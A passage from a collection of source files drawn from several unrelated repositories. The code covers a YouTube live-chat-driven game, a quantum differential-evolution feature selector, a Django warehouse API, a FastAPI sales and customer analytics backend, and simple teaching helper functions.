self.get_formatted_chat_message_data(page_token=self.page_token, part=part) # yapf: disable if not next_chat_message: return self.page_token = next_chat_message["next_page_token"] return next_chat_message if __name__ == '__main__': import time import confing print("\n\n\n\n\n") youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY) # print(youtube_live_chat.get_chat_id(confing.YOTUBER_URL)) print(youtube_live_chat.get_next_chat_message()) time.sleep(5) print(youtube_live_chat.get_next_chat_message()) time.sleep(6) print(youtube_live_chat.get_next_chat_message()) # yt_url = input('Input YouTube URL > ') # chat_id = get_chat_id(yt_url) # chat_id = get_chat_id(confing.YOTUBER_URL) # url = 'https://www.googleapis.com/youtube/v3/liveChat/messages' # params = { # 'key': confing.YOTUBER_API_KEY, # 'liveChatId': chat_id, # 'part': 'id,snippet,authorDetails' # } # pageToken = None # if type(pageToken) == str: # params['pageToken'] = pageToken # data = requests.get(url, params=params).json() # print(data) """ chat_id = get_chat_id(confing.YOTUBER_URL) data = get_chat_message(confing.YOTUBER_API_KEY, chat_id) format_data = format_row_yotube_data(data) print(format_data) """ # data = [ # { # "author_channel_id": "5555", # "author_name": "sei", # "display_message": "楽しい!!!!!" # }, # { # "author_channel_id": "5555", # "author_name": "sei", # "display_message": "楽しい!!!!!" # }, # { # "author_channel_id": "5555", # "author_name": "sei", # "display_message": "楽しい!!!!!" # } # ] ``` #### File: share-game/share_game/main.py ```python from typing import List, Tuple, Optional import datetime from game.game import App from core import confing from core.youtube_api import YoutubeLiveChat from core.utils import ChatToCommand class App(App): def __init__(self, debug_mode=False): self.frame_counter = 0 """ command_list_per_s: List[Tuple[bool , bool , bool ]] command_list_per_s: List[Tuple[a_pressed, b_pressed, y_pressed]] """ self.command_list: Optional[List[Tuple[bool, bool, bool]]] = [] # self.command_list = [(False, True) for i in range(3)] self.youtube_live_chat = YoutubeLiveChat( confing.YOTUBER_URL, confing.YOTUBER_API_KEY, interval=1 ) self.chat_to_command = ChatToCommand() self.previous_token_time = datetime.datetime.now() super().__init__(debug_mode) def update(self): self.frame_counter = self.frame_counter % 30 self.frame_counter += 1 self.get_command() self.input_command(1) super().update() def input_command(self, step=1): if step < 1 or step > 30: class OutStepRange(Exception): def __str__(self) -> str: return "out of step randge. The range of steps is 1-30." raise OutStepRange if self.frame_counter % step == step - 1 and self.command_list: self.player.a_pressed, self.player.d_pressed, self.player.y_pressed = self.command_list.pop(0) # yapf: disable def get_command(self): def count_interval(): interval = datetime.datetime.now() - self.previous_token_time self.previous_token_time = datetime.datetime.now() return interval next_chat_message = self.youtube_live_chat.get_next_chat_message() if not next_chat_message or (len(next_chat_message["comments"]) == 0): if next_chat_message: print("---empty! %d s passed since last token---" % count_interval().seconds) return is_y_pressed = False if self.chat_to_command.data_set_to_num_of_command(next_chat_message)["y"] > 0: is_y_pressed = True if is_y_pressed: self.command_list.append(self.chat_to_command.str_to_command("y")) num_of_command_list = self.chat_to_command.data_to_num_of_command(next_chat_message) # yapf: disable for i in num_of_command_list: if i["vec2"] > 0: for j in range(i["vec2"]): self.command_list.append(self.chat_to_command.str_to_command("a")) elif i["vec2"] < 0: for j in range(-i["vec2"]): self.command_list.append(self.chat_to_command.str_to_command("d")) print("---message follows, %d s passed since last token---" % count_interval().seconds) for i in next_chat_message["comments"]: display_message = i["display_message"] print(display_message) # first_valid_command = self.chat_to_command.first_valid_command_str_to_command(display_message) # yapf: disable # if first_valid_command: # self.command_list.append(first_valid_command) if __name__ == "__main__": # youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY) App() ```
{ "source": "2021rahul/Feature_Subset_Selection_Genetic_Algorithm", "score": 3 }
#### File: Feature_Subset_Selection_Genetic_Algorithm/PYTHON_CODE/main.py ```python import config import quantum_diff_evol def elitist_quantum_diff_evol(): print("Initializing population") pop_qubits = quantum_diff_evol.pop_init() print("Observing population") pop_obs_qubits = quantum_diff_evol.pop_observe(pop_qubits) print("Calculating Initial Accuracy") qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits) for iter in range(0, config.EQDE_MAXITER): print("QDE iteration start") print("Iteration Number: ", iter) print("Calculating Original Accuracy") qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits) print("Mutating Population") pop_mut_qubits = quantum_diff_evol.pop_mutation(pop_qubits) print("Population crossover") pop_cross_qubits = quantum_diff_evol.pop_crossover(pop_qubits, pop_mut_qubits, qubits_accuracy) pop_obs_cross_qubits = quantum_diff_evol.pop_observe(pop_cross_qubits) print("Calculating Crossover Accuracy") cross_qubits_accuracy, cross_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_cross_qubits) print("Population Selection") pop_qubits, pop_obs_qubits = quantum_diff_evol.pop_selection(pop_qubits, pop_obs_qubits, qubits_accuracy, pop_cross_qubits, pop_obs_cross_qubits, cross_qubits_accuracy) final_pop_qubits = pop_qubits final_pop_obs_qubits = pop_obs_qubits print("Calculating Final Accuracy") final_qubtis_accuracy, final_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(final_pop_obs_qubits) quantum_diff_evol.print_output(final_pop_qubits, final_pop_obs_qubits, final_qubits_cross_val_score) if __name__ == "__main__": elitist_quantum_diff_evol() ```
{ "source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Cloud", "score": 2 }
#### File: warehouse_cloud/cloud/views.py ```python from django.http import HttpResponse from django.template import loader def index(request): template = loader.get_template('cloud/index.html') return HttpResponse(template.render()) def data(request): template = loader.get_template('cloud/data.html') return HttpResponse(template.render()) def experiment(request): template = loader.get_template('cloud/experiment.html') return HttpResponse(template.render()) ``` #### File: warehouse_cloud/cloud/warehouse.py ```python from . import rl from .models import Inventory, Order class Warehouse: def __init__(self, anomaly_aware): # config self.cap_conveyor = 5 self.cap_wait = 5 self.reward_order = 30 self.reward_trash = 70 self.reward_wait = 1 self.order_total = 20 self.order_delay = 0 self.anomaly_mtbf = 5 self.anomaly_duration = 10 self.anomaly_wait = 3 self.item_buy = 5 # Warehouse self.tick = 0 self.anomaly_aware = anomaly_aware try: self.rl_model = rl.DQN(path='../model/rl.pth') self.a_rl_models = [rl.DQN(path='../model/a_rl_0.pth'), None, rl.DQN(path='../model/a_rl_2.pth')] except: pass self.c = [0] * 4 self.recent_c = 0 self.recent_s = 0 self.c_waiting = 0 self.c_allow = 3 self.r_allow = [False] * 3 self.s_allow = 3 self.r_wait = [0] * 3 self.s_wait = 0 self.stuck = [False] * 3 self.count = [0] * 3 self.current_anomaly = [-1] * 3 self.reward = 0 self.old_state = None self.old_decision = None self.old_reward = 0 def need_decision(self): if sum(self.c) == 0: return False num_true = 0 for ans in self.available(): if ans: num_true += 1 return num_true > 1 def available(self, i=None): if i is not None: inventory_objects = Inventory.objects.filter(stored=i) ans = len(inventory_objects) < self.cap_conveyor if not self.anomaly_aware: return ans return ans and self.current_anomaly[i] == -1 ans = [] for i in range(3): inventory_objects = Inventory.objects.filter(stored=i) single_ans = len(inventory_objects) < self.cap_conveyor if not self.anomaly_aware: ans.append(single_ans) else: ans.append(single_ans and self.current_anomaly[i] == -1) return ans def get_available(self): available = self.available() ans = [] for i, avail in enumerate(available): if avail: ans.append(i) return ans def get_inventory(self, item): return self.c[item - 1] + len(Inventory.objects.filter(item_type=item, stored__lt=4)) def get_order(self, is_sum=True): if is_sum: return len(Order.objects.all()) orders = [] for i in range(4): orders.append(len(Order.objects.filter(item_type=i + 1))) return orders def get_state(self): def repr_list(conveyor): ans = 0 for i, item in enumerate(conveyor): ans += item.item_type * (5 ** (5 - i - 1)) return ans ans = [self.tick, self.recent_c] for i in range(4): ans.append(repr_list(Inventory.objects.filter(stored=i))) ans.extend(self.get_order(False)) return ans def anomaly_state(self): anomaly_number = 0 for i, anomaly in enumerate(self.current_anomaly): if anomaly != -1: anomaly_number += (2 ** i) return anomaly_number ```
{ "source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Repository-Edge", "score": 2 }
#### File: edge_repository/edge/api.py ```python import datetime import json import requests from drf_yasg.utils import swagger_auto_schema from rest_framework import serializers, viewsets from rest_framework.response import Response from edge_repository.settings import settings from . import models from .models import Sensory, Inventory, Order, Message, Status experiment_type = 'SAS' shipment_capacity = 0 # Serializer class SensoryListSerializer(serializers.ListSerializer): def create(self, validated_data): sensory_data_list = [Sensory(**item) for item in validated_data] return Sensory.objects.bulk_create(sensory_data_list) class SensorySerializer(serializers.ModelSerializer): class Meta: model = Sensory fields = '__all__' list_serializer_class = SensoryListSerializer class MessageSerializer(serializers.ModelSerializer): class Meta: model = Message fields = '__all__' # Sensory Data class SensoryViewSet(viewsets.ModelViewSet): queryset = Sensory.objects.all() serializer_class = SensorySerializer http_method_names = ['post'] @swagger_auto_schema(responses={400: "Bad Request"}) def create(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data, many=isinstance(request.data, list)) serializer.is_valid(raise_exception=True) self.perform_create(serializer) headers = self.get_success_headers(serializer.data) return Response(serializer.data, headers=headers) class MessageViewSet(viewsets.ModelViewSet): queryset = Message.objects.all() serializer_class = MessageSerializer http_method_names = ['post'] @swagger_auto_schema(responses={400: "Bad request", 204: "Invalid Message Title / Invalid Message Sender / Not allowed"}) def create(self, request, *args, **kwargs): global shipment_capacity, experiment_type super().create(request, *args, **kwargs) sender = int(request.data['sender']) title = request.data['title'] if sender == models.MACHINE_REPOSITORY_1 or sender == models.MACHINE_REPOSITORY_2 or sender == models.MACHINE_REPOSITORY_3: if title == 'Running Check': if len(Status.objects.all()) == 0: return Response("Not allowed", status=204) current_status = Status.objects.all()[0] if current_status.status: return Response(status=201) return Response("Not allowed", status=204) if title == 'Sending Check': stored = sender - models.MACHINE_REPOSITORY_1 if experiment_type == 'SAS': process_message = {'sender': models.EDGE_REPOSITORY, 'title': 'SAS Check', 'msg': stored} response = requests.post(settings['cloud_address'] + '/api/message/', data=process_message) if response.status_code == 204: return Response("Not allowed", status=204) shipment_capacity += 1 process_message = {'sender': models.EDGE_REPOSITORY, 'title': 'Order Processed', 'msg': stored} requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message) requests.post(settings['cloud_address'] + '/api/message/', data=process_message) return Response(status=201) first_item = Inventory.objects.filter(stored=stored)[0] target_orders = Order.objects.filter(item_type=first_item.item_type).order_by('made') if shipment_capacity < settings['max_capacity_shipment']: if len(target_orders) == 0: return Response("Not allowed", status=204) else: target_order = target_orders[0] target_order.delete() shipment_capacity += 1 process_message = {'sender': models.EDGE_REPOSITORY, 'title': 'Order Processed', 'msg': stored} requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message) requests.post(settings['cloud_address'] + '/api/message/', data=process_message) return Response(status=201) return Response("Not allowed", status=204) if title == 'Anomaly Occurred': location = sender - models.MACHINE_REPOSITORY_1 process_message = {'sender': models.EDGE_REPOSITORY, 'title': 'Anomaly Occurred', 'msg': location} requests.post(settings['cloud_address'] + '/api/message/', data=process_message) return Response(status=201) if title == 'Anomaly Solved': location = sender - models.MACHINE_REPOSITORY_1 process_message = {'sender': models.EDGE_REPOSITORY, 'title': 'Anomaly Solved', 'msg': location} requests.post(settings['cloud_address'] + '/api/message/', data=process_message) return Response(status=201) return Response("Invalid Message Title", status=204) if sender == models.EDGE_CLASSIFICATION: if title == 'Classification Processed': msg = json.loads(request.data['msg']) item_type = int(msg['item_type']) stored = int(msg['stored']) # Modify Inventory DB target_item = Inventory(item_type=item_type, stored=stored) target_item.save() return Response(status=201) return Response("Invalid Message Title", status=204) if sender == models.EDGE_SHIPMENT: if title == 'Order Processed': shipment_capacity -= 1 return Response(status=201) return Response("Invalid Message Title", status=204) if sender == models.CLOUD: if title == 'Order Created': order_data = json.loads(request.data['msg']) new_order = Order(item_type=int(order_data['item_type']), made=order_data['made']) new_order.save() return Response(status=201) if title == 'Start': experiment_type = request.data['msg'] Inventory.objects.all().delete() Order.objects.all().delete() shipment_capacity = 0 if len(Status.objects.all()) == 0: current_state = Status() else: current_state = Status.objects.all()[0] current_state.status = True current_state.save() return Response(status=201) if title == 'Stop': if len(Status.objects.all()) == 0: current_state = Status() else: current_state = Status.objects.all()[0] current_state.status = False current_state.save() return Response(status=201) return Response("Invalid Message Title", status=204) return Response("Invalid Message Sender", status=204) ```
{ "source": "2021-SW-Project-contest/sw-sangcharim-be", "score": 3 }
#### File: sw-sangcharim-be/api/database.py ```python from sqlalchemy import create_engine from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker import os # SQLALCHEMY_DATABASE_URL = "mariadb+mariadbconnector://{username}:{password}@{host}:{port}/{db_name}".format( # host=os.getenv('DB_SCR_HOST'), # username=os.getenv('DB_SCR_USERNAME'), # password=<PASSWORD>('<PASSWORD>'), # port=os.getenv('DB_SCR_PORT'), # db_name=os.getenv('DB_SCR_DATABASE') # ) SQLALCHEMY_DATABASE_URL = "postgresql://{username}:{password}@{host}:{port}/{db_name}".format( host=os.getenv('DB_SCR_HOST'), username=os.getenv('DB_SCR_USERNAME'), password=<PASSWORD>('<PASSWORD>'), port=os.getenv('DB_SCR_PORT'), db_name=os.getenv('DB_SCR_DATABASE') ) engine = create_engine(SQLALCHEMY_DATABASE_URL) SessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False) Base = declarative_base() def get_db(): db = SessionLocal() try: yield db finally: db.close() ``` #### File: api/routers/area_ro.py ```python from typing import List from fastapi import APIRouter, Depends from sqlalchemy.orm import Session from api import models from api.schemas import area_sc from api import database router = APIRouter( prefix="/area", tags=["Area"], responses={404: {"description": "Not found"}}, ) get_db = database.get_db @router.get("", response_model=List[area_sc.AreaSchema]) def getArea(db: Session=Depends(get_db)): """ `완료`\n `areaCategory` : 상권 대분류\n `areaList` : 대분류내의 상권 리스트\n `areaCode` : 세부 상권 코드\n `areaName` : 세부 상권 이름\n """ areaList = db.query(models.Area).all() areaCategoryList: list[str] = list(set([area.areaCategory for area in areaList])) result: list[area_sc.AreaSchema] = [area_sc.AreaSchema(areaCategory=areaCategory, areaList=[]) for areaCategory in areaCategoryList] for area in areaList: index = areaCategoryList.index(area.areaCategory) result[index].areaList.append(area_sc.Area( areaCode=area.areaCode, areaName=area.areaName, )) return result ``` #### File: api/routers/detail_ro.py ```python from typing import List, Optional from fastapi import APIRouter, Depends, HTTPException, status from sqlalchemy.orm import Session import math from api import database from api import models from api.schemas import detail_sc, area_sc router = APIRouter( prefix="/detail", tags=["Detail"], responses={404: {"description": "Not found"}}, ) get_db = database.get_db @router.get("/", response_model=detail_sc.DetailSchema) def getDetail(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)): """ `완료`\n `area` : 선택한 상권 정보\n `areaCode` : 상권 코드\n `areaName` : 상권 이름\n `businessList` : 가게 정보\n `businessCode` : 업종 코드\n `businessName` : 업종 이름\n `businessCount` : 상권내 해당 업종의 수\n -> businessCode1~3가 None이면 : 상권내의 가장 많은 업종 best3\n -> businessCode1~3에 값이 있으면 : 상권내의 선택한 업종 수 """ area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first() if not area: raise HTTPException( status_code=status.HTTP_404_NOT_FOUND, detail="해당 상권을 찾을 수 없습니다." ) result = [] storeList = db.query(models.Store).filter(models.Store.areaCode == areaCode) if not (businessCode1 or businessCode2 or businessCode3): # best3 뽑기 storeDict: dict = {} for store in storeList.all(): if store.businessCode in storeDict.keys(): storeDict[store.businessCode] += 1 else: storeDict[store.businessCode] = 1 for bestKey in sorted(storeDict, key=storeDict.get, reverse=True)[:3]: result.append( detail_sc.DetailBusiness( businessCode = bestKey, businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == bestKey).first().businessName, businessCount = storeDict[bestKey] ) ) else: # 선택한 애들의 수 뽑기 for businessCode in (businessCode1, businessCode2, businessCode3): if businessCode: result.append( detail_sc.DetailBusiness( businessCode = businessCode, businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName, businessCount = storeList.filter(models.Store.businessCode == businessCode).count() ) ) return detail_sc.DetailSchema( area = area_sc.Area( areaCode = area.areaCode, areaName = area.areaName, ), businessList = result ) @router.get("/sales", response_model=detail_sc.SalesSchema) def getSales(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)): """ `완료`\n `area` : 선택한 상권 정보\n `sales` : 상권의 매출 최소, 최대, 평균\n `day` : 상권의 요일별 평균 매출비율\n `time` : 상권의 시간대별 평균 매출비율\n _**(deprecated)** `businessList` : 선택한 업종의 정보_\n _**(deprecated)** `businessSale` : 업종 매출액_\n _**(deprecated)** `businessDay` : 업종의 요일별 매출비율_\n _**(deprecated)** `businessTime` : 업종의 시간대별 매출비율_\n -> businessCode1~3가 None이면 : []\n -> businessCode1~3에 값이 있으면 : 만약 해당 상권에 해당 업종이 없으면 추가 되지 않음. """ # 상권 area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first() if not area: raise HTTPException( status_code=status.HTTP_404_NOT_FOUND, detail="해당 상권을 찾을 수 없습니다." ) # 최소, 최대, 평균 매출 sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode) amountList = [sale.amount for sale in sales.all()] resultSales = detail_sc.Sales( min = min(amountList), max = max(amountList), avg = sum(amountList) / len(amountList), ) # 요일별 매출 salesIdList = [sale.id for sale in sales.all()] salesIdListCount = len(salesIdList) daySales = db.query(models.DaySales).filter(models.DaySales.salesId.in_(salesIdList)).all() resultDaySales = detail_sc.Day() for sale in daySales: resultDaySales.mon += sale.mondayRatio resultDaySales.tue += sale.tuesdayRatio resultDaySales.wed += sale.wednesdayRatio resultDaySales.thu += sale.thursdayRatio resultDaySales.fri += sale.fridayRatio resultDaySales.sat += sale.saturdayRatio resultDaySales.sun += sale.sundayRatio resultDaySales.mon = round(resultDaySales.mon / salesIdListCount) resultDaySales.tue = round(resultDaySales.tue / salesIdListCount) resultDaySales.wed = round(resultDaySales.wed / salesIdListCount) resultDaySales.thu = round(resultDaySales.thu / salesIdListCount) resultDaySales.fri = round(resultDaySales.fri / salesIdListCount) resultDaySales.sat = round(resultDaySales.sat / salesIdListCount) resultDaySales.sun = round(resultDaySales.sun / salesIdListCount) # 시간대별 매출 timeSales = db.query(models.TimeSales).filter(models.TimeSales.salesId.in_(salesIdList)).all() resultTimeSales = detail_sc.Time() for sale in timeSales: resultTimeSales.time0006 += sale.time0006 resultTimeSales.time0611 += sale.time0611 resultTimeSales.time1114 += sale.time1114 resultTimeSales.time1417 += sale.time1417 resultTimeSales.time1721 += sale.time1721 resultTimeSales.time2124 += sale.time2124 resultTimeSales.time0006 = round(resultTimeSales.time0006 / salesIdListCount) resultTimeSales.time0611 = round(resultTimeSales.time0611 / salesIdListCount) resultTimeSales.time1114 = round(resultTimeSales.time1114 / salesIdListCount) resultTimeSales.time1417 = round(resultTimeSales.time1417 / salesIdListCount) resultTimeSales.time1721 = round(resultTimeSales.time1721 / salesIdListCount) resultTimeSales.time2124 = round(resultTimeSales.time2124 / salesIdListCount) # 선택한 업종의 resultBusinessList: list[detail_sc.SalesBusiness] = [] if businessCode1 or businessCode2 or businessCode3: for businessCode in (businessCode1, businessCode2, businessCode3): if businessCode: targetSales = sales.filter(models.Sales.businessCode == businessCode).first() if not targetSales: continue targetDay = db.query(models.DaySales).filter(models.DaySales.id == targetSales.id).first() targetTime = db.query(models.TimeSales).filter(models.TimeSales.salesId == targetSales.id).first() resultBusinessList.append( detail_sc.SalesBusiness( businessCode = businessCode, businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName, businessSale = targetSales.amount, businessDay = detail_sc.Day( mon = targetDay.mondayRatio, tue = targetDay.tuesdayRatio, wed = targetDay.wednesdayRatio, thu = targetDay.thursdayRatio, fri = targetDay.fridayRatio, sat = targetDay.saturdayRatio, sun = targetDay.sundayRatio, ), businessTime = detail_sc.Time( time0006 = targetTime.time0006, time0611 = targetTime.time0611, time1114 = targetTime.time1114, time1417 = targetTime.time1417, time1721 = targetTime.time1721, time2124 = targetTime.time2124, ) ) ) # 리스트 구한 업종들의 전체 비율 listLength = len(resultBusinessList) resultSales = detail_sc.Sales( min = min(map(lambda x:x.businessSale, resultBusinessList)), max = max(map(lambda x:x.businessSale, resultBusinessList)), avg = round(sum(map(lambda x:x.businessSale, resultBusinessList)) / listLength) ) resultDaySales = detail_sc.Day( mon = round(sum(map(lambda x: x.businessDay.mon, resultBusinessList)) / listLength), tue = round(sum(map(lambda x: x.businessDay.tue, resultBusinessList)) / listLength), wed = round(sum(map(lambda x: x.businessDay.wed, resultBusinessList)) / listLength), thu = round(sum(map(lambda x: x.businessDay.thu, resultBusinessList)) / listLength), fri = round(sum(map(lambda x: x.businessDay.fri, resultBusinessList)) / listLength), sat = round(sum(map(lambda x: x.businessDay.sat, resultBusinessList)) / listLength), sun = round(sum(map(lambda x: x.businessDay.sun, resultBusinessList)) / listLength), ) resultTimeSales = detail_sc.Time( time0006 = round(sum(map(lambda x: x.businessTime.time0006, resultBusinessList)) / listLength), time0611 = round(sum(map(lambda x: x.businessTime.time0611, resultBusinessList)) / listLength), time1114 = round(sum(map(lambda x: x.businessTime.time1114, resultBusinessList)) / listLength), time1417 = round(sum(map(lambda x: x.businessTime.time1417, resultBusinessList)) / listLength), time1721 = round(sum(map(lambda x: x.businessTime.time1721, resultBusinessList)) / listLength), time2124 = round(sum(map(lambda x: x.businessTime.time2124, resultBusinessList)) / listLength), ) return detail_sc.SalesSchema( area = area_sc.Area( areaCode = area.areaCode, areaName = area.areaName, ), sales = resultSales, day = resultDaySales, time = resultTimeSales, # businessList = resultBusinessList ) @router.get("/customer", response_model=detail_sc.CustomerSchema) def getCustomer(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)): """ `완료`\n `area` : 선택한 상권 정보\n `genderRatio` : 선택한 상권의 매출 성비\n `ageRatio` : 선택한 상권의 연령별 매출\n _**(deprecated)** `businessList` : 선택한 업종의 정보_\n """ area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first() resultCustomerList: list[detail_sc.CustomerBusiness] = [] sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode) salesIdList = [] for sale in sales: salesIdList.append(sale.id) customers = db.query(models.CustomerSales).filter(models.CustomerSales.salesId.in_(salesIdList)) # 선택 업종이 없는 경우 # 남여 비율 계산하기 man_sum = woman_sum = 0 for customer in customers: man_sum += customer.man woman_sum += customer.woman man_ratio = round(man_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList)))) woman_ratio = round(woman_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList)))) # 나이대별 비율 계산하기 age_sum_list = [] age10_sum = age20_sum = age30_sum = age40_sum = age50_sum = age60_sum = 0 for customer in customers: age10_sum += customer.age10 age20_sum += customer.age20 age30_sum += customer.age30 age40_sum += customer.age40 age50_sum += customer.age50 age60_sum += customer.age60 age_sum_list.extend([age10_sum, age20_sum, age30_sum, age40_sum, age50_sum, age60_sum]) age_ratio = [] for age in age_sum_list: ratio = (age/len(salesIdList)) * (100/(sum(age_sum_list)/len(salesIdList))) age_ratio.append(round(ratio)) age10_ratio = age_ratio[0] age20_ratio = age_ratio[1] age30_ratio = age_ratio[2] age40_ratio = age_ratio[3] age50_ratio = age_ratio[4] age60_ratio = age_ratio[5] # 선택 업종이 있는 경우 if businessCode1 or businessCode2 or businessCode3: for businessCode in (businessCode1, businessCode2, businessCode3): if not businessCode: continue try: targetSales = sales.filter(models.Sales.businessCode == businessCode).first() targetCustomer = db.query(models.CustomerSales).filter(models.CustomerSales.id == targetSales.id).first() # 업종 남녀비율 계산 man_ratio1 = targetCustomer.man * (100/(targetCustomer.man + targetCustomer.woman)) woman_ratio1 = targetCustomer.woman * (100/(targetCustomer.man + targetCustomer.woman)) # 업종 나이대별 비율 계산 age_sum = targetCustomer.age10 + targetCustomer.age20 + targetCustomer.age30 + targetCustomer.age40 + targetCustomer.age50 + targetCustomer.age60 age10_ratio1 = targetCustomer.age10 * (100/age_sum) age20_ratio1 = targetCustomer.age20 * (100/age_sum) age30_ratio1 = targetCustomer.age30 * (100/age_sum) age40_ratio1 = targetCustomer.age40 * (100/age_sum) age50_ratio1 = targetCustomer.age50 * (100/age_sum) age60_ratio1 = targetCustomer.age60 * (100/age_sum) resultCustomerList.append( detail_sc.CustomerBusiness( businessCode = businessCode, businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName, businessGender = detail_sc.CustomerGenderRatio( male = round(man_ratio1), female = round(woman_ratio1) ), businessAge = detail_sc.CustomerAgeRatio( age10 = round(age10_ratio1), age20 = round(age20_ratio1), age30 = round(age30_ratio1), age40 = round(age40_ratio1), age50 = round(age50_ratio1), age60 = round(age60_ratio1) ) ) ) except: continue # 리스트 구한 업종들의 전체 비율 listLength = len(resultCustomerList) man_ratio = sum(map(lambda x: x.businessGender.male, resultCustomerList)) / listLength woman_ratio = sum(map(lambda x: x.businessGender.female, resultCustomerList)) / listLength age10_ratio = sum(map(lambda x: x.businessAge.age10, resultCustomerList)) / listLength age20_ratio = sum(map(lambda x: x.businessAge.age20, resultCustomerList)) / listLength age30_ratio = sum(map(lambda x: x.businessAge.age30, resultCustomerList)) / listLength age40_ratio = sum(map(lambda x: x.businessAge.age40, resultCustomerList)) / listLength age50_ratio = sum(map(lambda x: x.businessAge.age50, resultCustomerList)) / listLength age60_ratio = sum(map(lambda x: x.businessAge.age60, resultCustomerList)) / listLength return detail_sc.CustomerSchema( area = area_sc.Area( areaCode = area.areaCode, areaName = area.areaName, ), genderRatio = detail_sc.CustomerGenderRatio( male = man_ratio, female = woman_ratio ), ageRatio = detail_sc.CustomerAgeRatio( age10 = age10_ratio, age20 = age20_ratio, age30 = age30_ratio, age40 = age40_ratio, age50 = age50_ratio, age60 = age60_ratio ), # business = resultCustomerList ) @router.get("/future", response_model=detail_sc.FutureSchema) def getFuture(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)): """ `완료`\n `area` : 선택한 상권 정보\n `areaSituation` : 선택한 상권의 전망 **(정체, 상권축소, 상권확장, 다이나믹)**\n `areaClosure` : 선택한 상권의 폐업률\n _**(deprecated)** `business` : 선택한 업종의 정보_\n """ situationStr = { 1: "정체", 2: "상권축소", 3: "상권확장", 4: "다이나믹" } area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first() resultFutureList: list[detail_sc.FutureBusiness] = [] # 선택 업종이 없는 경우 # 상권내 전체 점포 폐업률의 합/전체 점포의 수 change_sum = change_cnt = 0 changeList = db.query(models.Change).filter(models.Change.areaCode == areaCode) for change in changeList: change_sum += change.closure change_cnt += 1 area_closure = int(change_sum / change_cnt) # 선택 업종이 있는 경우 if businessCode1 or businessCode2 or businessCode3: for businessCode in (businessCode1, businessCode2, businessCode3): if not businessCode: continue targetClosure = db.query(models.Change).filter(models.Change.areaCode == areaCode) \ .filter(models.Change.businessCode == businessCode).first() try: resultFutureList.append( detail_sc.FutureBusiness( businessCode = businessCode, businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName, businessClosure = targetClosure.closure ) ) except: continue # 리스트 구한 업종들의 전체 비율 area_closure = sum(map(lambda x: x.businessClosure, resultFutureList)) / len(resultFutureList) return detail_sc.FutureSchema( area = area_sc.Area( areaCode = area.areaCode, areaName = area.areaName, ), areaSituation = situationStr[area.status], areaClosure = area_closure, # business = resultFutureList ) ```
{ "source": "2022AC12SDD/Aurora_SDD_Template", "score": 3 }
#### File: 2022AC12SDD/Aurora_SDD_Template/test_helpers.py ```python import pytest import helpers as h def test_ultimate_answer(): question1 = 'What is the meaning of Life, The Universe, Everything?' assert h.ultimate_answer(question1) == '42' question2 = 'What is 6 x 7' assert h.ultimate_answer(question2) == 'That is not much of a question' ```
{ "source": "2022AC12SDD/control-structures-dvorakman", "score": 4 }
#### File: 2022AC12SDD/control-structures-dvorakman/helpers.py ```python def ultimate_answer(question): """Provides an answer to the ultimate question. Returns '42' if the question is 'What is the meaning of Life, The Universe, Everything?' otherwise returns 'That is not much of a question' args: question (str): The question to be answered. returns: str """ if question == "What is the meaning of Life, The Universe, Everything?": answer = "42" else: answer = "That is not much of a question" return answer ## binary selection ## def check_guess_bin(guess, target): """Checks a guess to see if it is the same as the target. Complete this function using binary selection Args: guess: int - the guessed number target: int - the correct or target number Returns: winner: bool - True if correct guess otherwise false """ if guess == target: return True else: return False ## multiway selection def check_guess_multi(guess, target): """Checks a guess to see if it is the same as the target. If the guess is incorrect, prompts the player to guess higher or lower as appropriate. Complete this function using multi-way selection Args: guess: int - the guessed number target: int - the correct or target number Returns: prompt: str - "higher", "lower" or "correct" """ while guess != target: if guess > target: guess = int(input("Lower: ")) else: guess = int(input("Higher: ")) print("Correct") ## pre-test repetition def factorial(num): """Calculates the factorial of a number. Use pre-test repetition to write a function that computes the factorial of a number. A factorial of a number is the product of all the positive integers less than it. For example 4 factorial is 4 x 3 x 2 x 1 = 24 Args: num: int - the number for which to calculate the factorial Returns: fact: the factorial of num """ iteration = 0 fact = 1 while iteration < num: for i in range(1,num+1): iteration = iteration + 1 fact = fact * i return fact ## counted repetition def add_array(in_array): """Adds the elements of an array. Use counted repetition, using a start, finish and a step, to sum the elements of an array Args: in_array: array if numbers to be added Returns: sum: the sum of the array """ sum = 0 for i in range(0, len(in_array)): sum = sum + in_array[i] return sum ```
{ "source": "2022-capstone-design-KPUCS/capstone-drone-backend", "score": 2 }
